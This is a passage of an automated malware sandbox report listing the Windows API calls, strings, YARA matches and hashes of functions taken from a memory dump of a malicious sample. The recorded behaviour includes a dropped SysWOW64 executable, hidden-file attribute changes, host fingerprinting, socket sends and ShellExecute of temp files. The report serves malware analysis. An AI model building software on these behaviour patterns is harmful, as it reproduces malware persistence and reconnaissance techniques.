                                                                                        • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction ID: 8b9d04fc958d3c21103344d89b1652f90c6379ec96878616a1972519f081f282
                                                                                        • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction Fuzzy Hash: 38514AB1A11B418FD7248F29C5D462ABBE9FB48304B50593FE18BC7BA0E778E840CB10
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 0040815F
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408187
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 004081BE
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408210
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                          • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 124786226-2650950432
                                                                                        • Opcode ID: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                        • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                        • Opcode Fuzzy Hash: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                        • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02D771E1
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77228
                                                                                        • LocalFree.KERNEL32(?,?,?), ref: 02D77286
                                                                                        • wsprintfA.USER32 ref: 02D7729D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                        • String ID: |
                                                                                        • API String ID: 2539190677-2343686810
                                                                                        • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction ID: af79726d4169f36effdbd8b38323f2df75d5be2d68d60aadfc4797ef6956df1f
                                                                                        • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction Fuzzy Hash: AC310A72900208BFDB11DFA4DC45BDA7BA8EF04314F14C066F959DB210EB79DA48CBA4
                                                                                        APIs
                                                                                        • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                        • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$gethostnamelstrcpy
                                                                                        • String ID: LocalHost
                                                                                        • API String ID: 3695455745-3154191806
                                                                                        • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                        • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                        • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1586453840-0
                                                                                        • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                        • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 02D7B51A
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 02D7B529
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 02D7B548
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 02D7B590
                                                                                        • wsprintfA.USER32 ref: 02D7B61E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4026320513-0
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 6e8e3df55bd1d04077723822a3f1dcd53f9b1c3fd0b04ae86ff693133c4daf5b
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: 0051FEB1D0021DAACF14DFD5D8885EEBBB9AF48304F10856BE505A6250E7B84AC9CF98
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                        • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                        • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                        • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2438460464-0
                                                                                        • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                        • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02D76303
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02D7632A
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 02D763B1
                                                                                        • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02D76405
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HugeRead$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 3498078134-0
                                                                                        • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction ID: efb44f1a28a4001c391c36183f299c8b19ee6531ff795df913919b1d62204326
                                                                                        • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction Fuzzy Hash: 1E414C71A04A05EBDB14CF58C884BA9B7B9EF04358F188179E9A5D7390F779ED40CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                        • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,00405EC1), ref: 0040E693
                                                                                        • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,00405EC1), ref: 0040E6E9
                                                                                        • lstrcmpA.KERNEL32(?,00000008,?,75920F10,00000000,?,00405EC1), ref: 0040E722
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                        • String ID: A$ A
                                                                                        • API String ID: 3343386518-686259309
                                                                                        • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                        • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040272E
                                                                                        • htons.WS2_32(00000001), ref: 00402752
                                                                                        • htons.WS2_32(0000000F), ref: 004027D5
                                                                                        • htons.WS2_32(00000001), ref: 004027E3
                                                                                        • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                          • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                          • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                        • String ID:
                                                                                        • API String ID: 1802437671-0
                                                                                        • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                        • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 3981526788-0
                                                                                        • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                        • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                        • CharToOemA.USER32(?,?), ref: 00409174
                                                                                        • wsprintfA.USER32 ref: 004091A9
                                                                                          • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                          • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                          • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                          • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                          • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                          • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3857584221-0
                                                                                        • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                        • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 02D793C6
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 02D793CD
                                                                                        • CharToOemA.USER32(?,?), ref: 02D793DB
                                                                                        • wsprintfA.USER32 ref: 02D79410
                                                                                          • Part of subcall function 02D792CB: GetTempPathA.KERNEL32(00000400,?), ref: 02D792E2
                                                                                          • Part of subcall function 02D792CB: wsprintfA.USER32 ref: 02D79350
                                                                                          • Part of subcall function 02D792CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D79375
                                                                                          • Part of subcall function 02D792CB: lstrlen.KERNEL32(?,?,00000000), ref: 02D79389
                                                                                          • Part of subcall function 02D792CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02D79394
                                                                                          • Part of subcall function 02D792CB: CloseHandle.KERNEL32(00000000), ref: 02D7939B
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02D79448
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3857584221-0
                                                                                        • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction ID: 82f217a62fd36752c9e311caf93bc6f8670303bb2cde4d2cae48e43b06e8d321
                                                                                        • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction Fuzzy Hash: 98015EF69001587BDB21A7619D8DEDF3B7CDB95701F0040A2BB49E2180EAB89AC5CF75
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00402452
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1808961391-1857712256
                                                                                        • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                        • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 2574300362-1087626847
                                                                                        • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                        • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2777991786-2393279970
                                                                                        • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                        • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                        • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID: *p@
                                                                                        • API String ID: 3429775523-2474123842
                                                                                        • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                        • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg$u6A
                                                                                        • API String ID: 1594361348-1940331995
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: fe5b9b89d2109086e851b550031d38cfb47cf1f7d9648d636958c6bb5e2b542b
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 79E08C306041518FCB008B28F888AC537A4AF0A330F048180F840C32A0D738DD80D640
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 02D769E5
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 02D76A26
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 02D76A3A
                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 02D76BD8
                                                                                          • Part of subcall function 02D7EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02D71DCF,?), ref: 02D7EEA8
                                                                                          • Part of subcall function 02D7EE95: HeapFree.KERNEL32(00000000), ref: 02D7EEAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 3384756699-0
                                                                                        • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction ID: 74a5e140624ba027ce7d7170df87a800fecbc2fe470fdbda231e15cdf3ccf064
                                                                                        • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction Fuzzy Hash: D4712771D0061DEFDF11DFA4CC80AEEBBB9FB05314F1045AAE515A6290E7349E92CBA0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                        • API String ID: 2111968516-120809033
                                                                                        • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                        • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                        • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
                                                                                        • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
                                                                                        • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseCreateDelete
                                                                                        • String ID:
                                                                                        • API String ID: 2667537340-0
                                                                                        • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                        • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                        • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
